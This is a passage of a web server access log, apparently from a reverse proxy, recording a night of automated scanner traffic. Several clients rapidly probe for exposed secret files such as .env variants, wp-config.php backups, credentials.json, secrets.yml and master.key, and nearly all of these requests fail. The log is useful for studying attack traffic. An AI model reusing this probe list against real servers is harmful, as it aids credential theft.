[Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:21:26:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:21:30:59 +0000] 404 - GET http 91.82.83.208 "/login" [Client 103.252.89.75] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[18/Jan/2026:21:38:46 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:43:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:44:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:47:32 +0000] 404 - GET http 91.82.83.208 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[18/Jan/2026:21:51:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:22:01:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 31.131.116.9] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 OPR/106.0.0." "-" +[18/Jan/2026:22:10:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:22:10:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 35.233.96.173] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[18/Jan/2026:22:10:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:22:21:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:22:24:37 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:22:31:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 181.214.147.64] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:22:34:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:22:37:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:22:38:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 199.45.155.89] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:22:38:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.89] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:22:38:48 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:22:38:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.89] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:22:38:54 +0000] 404 - GET http 91.82.83.208 "/sitemap.xml" [Client 199.45.155.89] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:22:38:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.89] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:22:47:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:22:59:14 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11" "-" +[18/Jan/2026:22:59:15 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.01 [de]" "-" +[18/Jan/2026:22:59:15 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" "-" +[18/Jan/2026:22:59:15 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" "-" +[18/Jan/2026:22:59:16 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3)" "-" +[18/Jan/2026:22:59:16 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0" "-" +[18/Jan/2026:22:59:16 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; SRS_IT_E8790575B2765C5133A096; BRI/1; AskTbAD3/5.15.15.35882)" "-" +[18/Jan/2026:22:59:16 +0000] 404 - GET http 91.82.83.208 "/getcfg.php" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/52.0.2871.40" "-" +[18/Jan/2026:22:59:17 +0000] 404 - GET http 91.82.83.208 "/cp/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; es-es) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16" "-" +[18/Jan/2026:22:59:18 +0000] 404 - GET http 91.82.83.208 "/ads/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 GoogleToolbarFF 7.1.20110512 GoogleToolbarFF 7.1.20110512 GoogleToolbarFF 7.1.20110512 GoogleToolbarFF 7.1.20110512" "-" +[18/Jan/2026:22:59:18 +0000] 404 - GET http 91.82.83.208 "/config/aws.yml" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 OPR/51.0.2830.23 (Edition beta)" "-" +[18/Jan/2026:22:59:18 +0000] 404 - GET http 91.82.83.208 "/staticfiles/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5" "-" +[18/Jan/2026:22:59:18 +0000] 404 - GET http 91.82.83.208 "/opt/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:38.0) Gecko/20100101 Firefox/38.0" "-" +[18/Jan/2026:22:59:18 +0000] 404 - GET http 91.82.83.208 "/Api/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/51.0.2830.34" "-" +[18/Jan/2026:22:59:19 +0000] 404 - GET http 91.82.83.208 "/App/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1" "-" +[18/Jan/2026:22:59:20 +0000] 404 - GET http 91.82.83.208 "/psnlink/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 OPR/23.0.1522.77 (Edition Campaign 37)" "-" +[18/Jan/2026:22:59:21 +0000] 404 - GET http 91.82.83.208 "/ftpmaster/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Safari/604.1.34" "-" +[18/Jan/2026:22:59:21 +0000] 404 - GET http 91.82.83.208 "/error/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)" "-" +[18/Jan/2026:22:59:21 +0000] 404 - GET http 91.82.83.208 "/div/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0" "-" +[18/Jan/2026:22:59:21 +0000] 404 - GET http 91.82.83.208 "/theme/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SCH-R530U Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 USCC-R530U" "-" +[18/Jan/2026:22:59:21 +0000] 404 - GET http 91.82.83.208 "/well-known/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0" "-" +[18/Jan/2026:22:59:23 +0000] 404 - GET http 91.82.83.208 "/old.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/environments/local/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; Z981 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/environments/production/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/6.0 (Windows XP; U) [de]" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/scripts/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.4" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/styles/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/inc/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/.env_bak" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.7.10) Gecko/20050730 Firefox/1.0.6 (Debian package 1.0.6-2)" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/.env-sample" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36" "-" +[18/Jan/2026:22:59:24 +0000] 404 - GET http 91.82.83.208 "/fastlane/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "-" +[18/Jan/2026:23:00:42 +0000] 404 - GET http 91.82.83.208 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:23:00:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:02:09 +0000] 404 - GET http 91.82.83.208 "/login" [Client 103.252.89.75] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[18/Jan/2026:23:04:02 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:23:04:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:23:05:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:14:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:17:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:23:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:29:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.local" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.production" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.development" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.dev" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.prod" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.test" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.staging" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.backup" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:20 +0000] 404 - GET http 91.82.83.208 "/.env.save" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:21 +0000] 404 - GET http 91.82.83.208 "/.env.old" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:21 +0000] 404 - GET http 91.82.83.208 "/.env.bak" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:21 +0000] 404 - GET http 91.82.83.208 "/.env.tmp" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:21 +0000] 404 - GET http 91.82.83.208 "/.env.swp" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:21 +0000] 404 - GET http 91.82.83.208 "/.env~" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:21 +0000] 404 - GET http 91.82.83.208 "/env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:21 +0000] 400 - GET http 91.82.83.208 "/env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/env.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/src/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/config/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/frontend/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/server/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/client/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/web/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/public/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/private/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/var/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/docker-compose.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:22 +0000] 404 - GET http 91.82.83.208 "/docker-compose.yaml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:23 +0000] 404 - GET http 91.82.83.208 "/docker-compose.override.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:23 +0000] 404 - GET http 91.82.83.208 "/docker-compose.dev.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:23 +0000] 404 - GET http 91.82.83.208 "/docker-compose.prod.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:23 +0000] 400 - GET http 91.82.83.208 "/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:23:32:23 +0000] 404 - GET http 91.82.83.208 "/config.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:24 +0000] 400 - GET http 91.82.83.208 "/settings.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:23:32:24 +0000] 404 - GET http 91.82.83.208 "/settings.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:24 +0000] 404 - GET http 91.82.83.208 "/secrets.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:24 +0000] 404 - GET http 91.82.83.208 "/credentials.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/settings.py" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/config.py" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/secrets.py" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/config/secrets.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/config/master.key" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/wp-config.php.bak" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/wp-config.php.old" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/wp-config.php.save" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/wp-config.php.txt" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/wp-config.php~" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/config/app.php" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/application.properties" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/application.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/application.yaml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/application-dev.properties" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:25 +0000] 404 - GET http 91.82.83.208 "/application-prod.properties" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/appsettings.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/appsettings.Development.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/appsettings.Production.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/config.yaml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/config.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/config.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/serverless.yml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/serverless.yaml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/vercel.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/netlify.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/config/production.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/config/development.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/config/default.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/config/local.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:26 +0000] 404 - GET http 91.82.83.208 "/conf/settings.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/data/config.json" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 